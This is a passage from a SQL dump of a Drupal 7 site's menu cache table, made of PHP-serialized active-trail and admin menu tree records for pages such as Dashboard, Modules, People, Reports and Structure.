rail\";a:3:{i:0;i:0;i:1;s:1:\"1\";i:9;s:1:\"9\";}}',0,1423658880,1),('links:management:page:admin/dashboard:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:3:{i:0;i:0;i:1;s:1:\"1\";i:11;s:2:\"11\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:1;s:1:\"1\";i:11;s:2:\"11\";}}',0,1423775242,1),('links:management:page:admin/modules:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:3:{i:0;i:0;i:1;s:1:\"1\";i:16;s:2:\"16\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:1;s:1:\"1\";i:16;s:2:\"16\";}}',0,1423658761,1),('links:management:page:admin/people/permissions:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:18;s:2:\"18\";i:49;s:2:\"49\";}s:12:\"active_trail\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:18;s:2:\"18\";i:49;s:2:\"49\";}}',0,1423658773,1),('links:management:page:admin/people:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:3:{i:0;i:0;i:1;s:1:\"1\";i:18;s:2:\"18\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:1;s:1:\"1\";i:18;s:2:\"18\";}}',0,1423658781,1),('links:management:page:admin/reports/dblog:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:50;s:2:\"50\";}s:12:\"active_trail\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:50;s:2:\"50\";}}',0,1423659033,1),('links:management:page:admin/reports/fields:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:42;s:2:\"42\";}s:12:\"active_trail\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:42;s:2:\"42\";}}',0,1423659086,1),('links:management:page:admin/reports/hits:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:352;s:3:\"352\";}s:12:\"active_trail\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:352;s:3:\"352\";}}',0,1423659098,1),('links:management:page:admin/reports/updates/update:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:5:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:260;s:3:\"260\";i:267;s:3:\"267\";}s:12:\"active_trail\";a:5:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:260;s:3:\"260\";i:267;s:3:\"267\";}}',0,1426848142,1),('links:management:page:admin/reports/visitors:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:355;s:3:\"355\";}s:12:\"active_trail\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:355;s:3:\"355\";}}',0,1423659117,1),('links:management:page:admin/reports:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:3:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";}}',0,1423659027,1),('links:management:page:admin/structure/block/manage/block/1/configure:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:6:{i:0;i:0;i:1;s:1:\"1\";i:21;s:2:\"21\";i:30;s:2:\"30\";i:155;s:3:\"155\";i:175;s:3:\"175\";}s:12:\"active_trail\";a:6:{i:0;i:0;i:1;s:1:\"1\";i:21;s:2:\"21\";i:30;s:2:\"30\";i:155;s:3:\"155\";i:175;s:3:\"175\";}}',0,1424617194,1),('links:management:page:admin/structure/contact:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:21;s:2:\"21\";i:363;s:3:\"363\";}s:12:\"active_trail\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:21;s:2:\"21\";i:363;s:3:\"363\";}}',0,1423658794,1),('links:management:page:admin/structure/menu/manage/navigation/list:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:5:{i:0;i:0;i:1;s:1:\"1\";i:21;s:2:\"21\";i:47;s:2:\"47\";i:185;s:3:\"185\";}s:12:\"active_trail\";a:5:{i:0;i:0;i:1;s:1:\"1\";i:21;s:2:\"21\";i:47;s:2:\"47\";i:185;s:3:\"185\";}}',0,1423659147,1),('links:management:tree-data:en:0180e077fe21fe1810b1d60dc087fa7211ee764e860c969294838f3654efda72','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:5:{i:30;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"30\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:21:\"admin/structure/block\";s:11:\"router_path\";s:21:\"admin/structure/block\";s:10:\"link_title\";s:6:\"Blocks\";s:7:\"options\";s:129:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:79:\"Configure what block content appears in your site\'s sidebars and other regions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:19:\"block_admin_display\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"bartik\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:6:\"Blocks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:79:\"Configure what block content appears in your site\'s sidebars and other regions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:36;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"36\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:21:\"admin/structure/types\";s:11:\"router_path\";s:21:\"admin/structure/types\";s:10:\"link_title\";s:13:\"Content 